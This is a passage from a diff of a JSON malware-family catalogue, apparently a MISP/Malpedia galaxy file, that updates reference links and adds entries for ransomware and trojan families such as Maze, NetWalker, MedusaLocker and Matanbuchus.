+23291,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball", "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/" ], "synonyms": [], "type": [] @@ -20594,11 +23474,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", - "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", "https://medium.com/coinmonks/passive-income-of-cyber-criminals-dissecting-bitcoin-multiplier-scam-b9d2b6048372", - "https://www.youtube.com/watch?v=lqWJaaofNf4", + "https://therecord.media/printnightmare-vulnerability-weaponized-by-magniber-ransomware-gang/", + "https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/", + "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", + "https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware", "http://asec.ahnlab.com/1124", - "https://asec.ahnlab.com/en/19273/" + "https://decoded.avast.io/janvojtesek/magnitude-exploit-kit-still-alive-and-kicking/", + "https://www.youtube.com/watch?v=lqWJaaofNf4", + "https://asec.ahnlab.com/en/19273/", + "https://teamt5.org/tw/posts/internet-explorer-the-vulnerability-ridden-browser/" ], "synonyms": [], "type": [] @@ -20611,6 +23496,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mailto", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", "https://id-ransomware.blogspot.com/2019/09/koko-ransomware.html", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/take-a-netwalk-on-the-wild-side/", @@ -20625,8 +23511,13 @@ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://lopqto.me/posts/automated-dynamic-import-resolving", "https://cert-agid.gov.it/news/netwalker-il-ransomware-che-ha-beffato-lintera-community/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-three-of-three/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers", "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", "https://blogs.blackberry.com/en/2021/03/zerologon-to-ransomware", @@ -20635,11 +23526,16 @@ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/an-in-depth-look-at-mailto-ransomware-part-one-of-three/", "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/ReportCSIT-20081e.pdf", + "https://seguranca-informatica.pt/netwalker-ransomware-full-analysis/", "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million/", "https://www.ucsf.edu/news/2020/06/417911/update-it-security-incident-ucsf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", "https://krebsonsecurity.com/2021/01/arrest-seizures-tied-to-netwalker-ransomware", "https://www.bleepingcomputer.com/news/security/enel-group-hit-by-ransomware-again-netwalker-demands-14-million", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download", "https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/", "https://www.bleepingcomputer.com/news/security/mailto-netwalker-ransomware-targets-enterprise-networks/", "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", @@ -20650,9 +23546,12 @@ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://www.crowdstrike.com/blog/analysis-of-ecrime-menu-style-toolkits/", - "https://www.justice.gov/usao-mdfl/press-release/file/1360846/download", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://zengo.com/bitcoin-ransomware-detective-ucsf/" + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://zengo.com/bitcoin-ransomware-detective-ucsf/", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/" ], "synonyms": [ "Koko Ransomware", @@ -20663,6 +23562,22 @@ "uuid": "722aab64-a02a-40fc-8c05-6b0344fad9b8", "value": "Mailto" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o", + "https://rt-solar.ru/upload/iblock/b55/Ataki-na-FOIV_otchet-NKTSKI-i-Rostelekom_Solar_otkrytyy.pdf", + "https://blog.group-ib.com/task", + "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", + "https://therecord.media/fsb-nktski-foreign-cyber-mercenaries-breached-russian-federal-agencies/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d41f513c-97e2-4588-a669-aa93b6378ef1", + "value": "Mail-O" + }, { "description": "", "meta": { @@ -20682,9 +23597,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", + "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs", "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", - "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/", - "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" + "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/", + "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/" ], "synonyms": [], "type": [] @@ -20753,6 +23669,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", "https://securelist.com/the-return-of-mamba-ransomware/79403/", + "https://www.ic3.gov/Media/News/2021/210323.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", "https://www.youtube.com/watch?v=LUxOcpIRxmg" ], @@ -20885,6 +23802,19 @@ "uuid": "6adb6fa0-1974-4d24-9c39-e76d5356cf6a", "value": "Mariposa" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.markirat", + "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c19ac191-a881-437f-ae82-7bec174590cb", + "value": "MarkiRAT" + }, { "description": "", "meta": { @@ -20906,6 +23836,7 @@ "https://fr3d.hk/blog/masslogger-frankenstein-s-creation", "https://medium.com/@mariohenkel/decrypt-masslogger-2-4-0-0-configuration-eff3ee0720a7", "https://blog.talosintelligence.com/2021/02/masslogger-cred-exfil.html", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", "https://decoded.avast.io/anhho/masslogger-v3-a-net-stealer-with-serious-obfuscation/", "https://maxkersten.nl/binary-analysis-course/malware-analysis/rezer0v4-loader/", "https://www.gdatasoftware.com/blog/2020/06/36129-harmful-logging-diving-into-masslogger", @@ -20919,6 +23850,19 @@ "uuid": "e1a09bf8-974a-4cc4-9ffd-758bed7a785e", "value": "MASS Logger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus", + "https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e30f2243-9e69-4b09-97ab-1643929b97ad", + "value": "Matanbuchus" + }, { "description": "", "meta": { @@ -20937,9 +23881,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom", - "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf", + "https://unit42.paloaltonetworks.com/matrix-ransomware/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware" + "https://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware", + "https://www.blackhoodie.re/assets/archive/Matrix_Ransomware_blackhoodie.pdf" ], "synonyms": [], "type": [] @@ -20988,82 +23933,119 @@ "uuid": "feb5ac55-7b28-47aa-9e9e-5007d838c0d5", "value": "Maudi" }, + { + "description": "Banking trojan written in Delphi, targeting customers of European and South American banks.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maxtrilha", + "https://seguranca-informatica.pt/the-new-maxtrilha-trojan-is-being-disseminated-and-targeting-several-banks/#.YT3_VfwzaKN" + ], + "synonyms": [], + "type": [] + }, + "uuid": "65799ce1-793d-4730-8d80-d829d7619dc6", + "value": "Maxtrilha" + }, { "description": "Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.\r\n\r\nActors are known to exfiltrate the data from the network for further extortion. It spreads mainly using email spam and various exploit kits (Spelevo, Fallout). \r\n\r\nThe code of Maze ransomware is highly complicated and obfuscated, which helps to evade security solutions using signature-based detections.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.maze", - "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md", - "https://sites.temple.edu/care/ci-rw-attacks/", - "https://www.secureworks.com/research/threat-profiles/gold-village", - "https://www.docdroid.net/dUpPY5s/maze.pdf", - "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", - "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", - "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/", - "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", - "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/", - "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U", - "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", - "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/", - "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", - "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", - "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", - "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat", - "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/", + "https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.docdroid.net/dUpPY5s/maze.pdf", + "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", + "https://www.zdnet.com/article/ransomware-gang-publishes-tens-of-gbs-of-internal-data-from-lg-and-xerox/", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/", - "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", - "https://securelist.com/maze-ransomware/99137/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/escape-from-the-maze/", - "https://oag.ca.gov/system/files/Letter%204.pdf", - "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", - "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://blog.talosintelligence.com/2019/12/IR-Lessons-Maze.html", "https://www.zataz.com/cyber-attaque-a-lencontre-des-serveurs-de-bouygues-construction/", - "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/318/Bitdefender-TRR-Whitepaper-Maze-creat4351-en-EN-GenericUse.pdf", - "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://www.cityofpensacola.com/DocumentCenter/View/18879/Deloitte-Executive-Summary-PDF", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", + "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.secureworks.com/research/threat-profiles/gold-village", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-behind-pensacola-cyberattack-1m-ransom-demand/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/", + "https://www.bleepingcomputer.com/news/security/chipmaker-maxlinear-reports-data-breach-after-maze-ransomware-attack/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", + "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", + "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/", + "https://twitter.com/certbund/status/1192756294307995655", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", + "https://oag.ca.gov/system/files/Letter%204.pdf", "https://blogs.quickheal.com/maze-ransomware-continues-threat-consumers/", - "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Maze.md", + "https://techcrunch.com/2020/03/26/chubb-insurance-breach-ransomware/", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://www.crowdstrike.com/blog/maze-ransomware-deobfuscation/", + "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", + "https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/", + "https://killbit.medium.com/applying-the-diamond-model-to-cognizant-msp-and-maze-ransomware-and-a-policy-assessment-498f01bd723f", + "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://nakedsecurity.sophos.com/2020/06/04/nuclear-missile-contractor-hacked-in-maze-ransomware-attack/", - "https://securelist.com/targeted-ransomware-encrypting-data/99255/", - "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://adversary.crowdstrike.com/adversary/twisted-spider/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://web.archive.org/save/https://news.cognizant.com/2020-04-18-cognizant-security-update", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://twitter.com/certbund/status/1192756294307995655", - "https://github.com/albertzsigovits/malware-notes/blob/master/Maze.md", - "https://www.bleepingcomputer.com/news/security/it-services-giant-cognizant-suffers-maze-ransomware-cyber-attack/" + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-releases-files-stolen-from-city-of-pensacola/", + "https://media-exp1.licdn.com/dms/document/C4E1FAQHyhJYCWxq5eg/feedshare-document-pdf-analyzed/0?e=1584129600&v=beta&t=9wTDR-mZPDF4ET7ABNgE2ab9g8e9wxQrhXsxI1cSX8U", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://labs.sentinelone.com/case-study-catching-a-human-operated-maze-ransomware-attack-in-action/", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.bleepingcomputer.com/news/security/allied-universal-breached-by-maze-ransomware-stolen-data-leaked/", + "https://securelist.com/maze-ransomware/99137/", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/", + "https://www.telsy.com/wp-content/uploads/Maze_Vaccine.pdf", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.brighttalk.com/webcast/7451/408167/navigating-maze-analysis-of-a-rising-ransomware-threat", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "http://www.secureworks.com/research/threat-profiles/gold-village", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://id-ransomware.blogspot.com/2019/05/chacha-ransomware.html", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/" ], "synonyms": [ "ChaCha" @@ -21174,18 +24156,21 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker", "http://id-ransomware.blogspot.com/2019/10/medusalocker-ransomware.html", "https://blog.talosintelligence.com/2020/04/medusalocker.html", - "https://www.cybereason.com/blog/medusalocker-ransomware", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://twitter.com/siri_urz/status/1215194488714346496?s=20", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", + "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://dissectingmalwa.re/try-not-to-stare-medusalocker-at-a-glance.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.carbonblack.com/2020/06/03/tau-threat-analyis-medusa-locker-ransomware/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://id-ransomware.blogspot.com/2020/01/ako-ransomware.html", - "https://twitter.com/siri_urz/status/1215194488714346496?s=20", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/" + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://www.cybereason.com/blog/medusalocker-ransomware", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/" ], "synonyms": [ "AKO Doxware", @@ -21213,6 +24198,7 @@ "https://news.sophos.com/en-us/2019/05/03/megacortex-ransomware-wants-to-be-the-one/", "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/", "https://threatpost.com/megacortex-ransomware-mass-distribution/146933/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/", "https://www.bleepingcomputer.com/news/security/new-megacortex-ransomware-changes-windows-passwords-threatens-to-publish-data/", "https://www.computing.co.uk/ctg/news/3084818/warning-over-lockergoga-and-megacortex-ransomware-attacks-targeting-private-industry-in-western-countries", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" @@ -21241,8 +24227,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mekotio", + "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/", + "http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/rooty-dolphin-uses-mekotio-to-target-bank-clients-in-south-america-and-europe/", - "https://www.welivesecurity.com/2020/08/13/mekotio-these-arent-the-security-updates-youre-looking-for/" + "https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/" ], "synonyms": [], "type": [] @@ -21283,15 +24271,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza", - "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", + "https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat", + "https://www.ic3.gov/Media/News/2021/210316.pdf", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://www.cybereason.com/blog/threat-analysis-report-inside-the-destructive-pysa-ransomware", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "http://www.secureworks.com/research/threat-profiles/gold-burlap", "https://www.zdnet.com/article/france-warns-of-new-ransomware-gang-targeting-local-governments/", "https://id-ransomware.blogspot.com/2019/10/mespinoza-ransomware.html", - "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://dissectingmalwa.re/another-one-for-the-collection-mespinoza-pysa-ransomware.html", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + 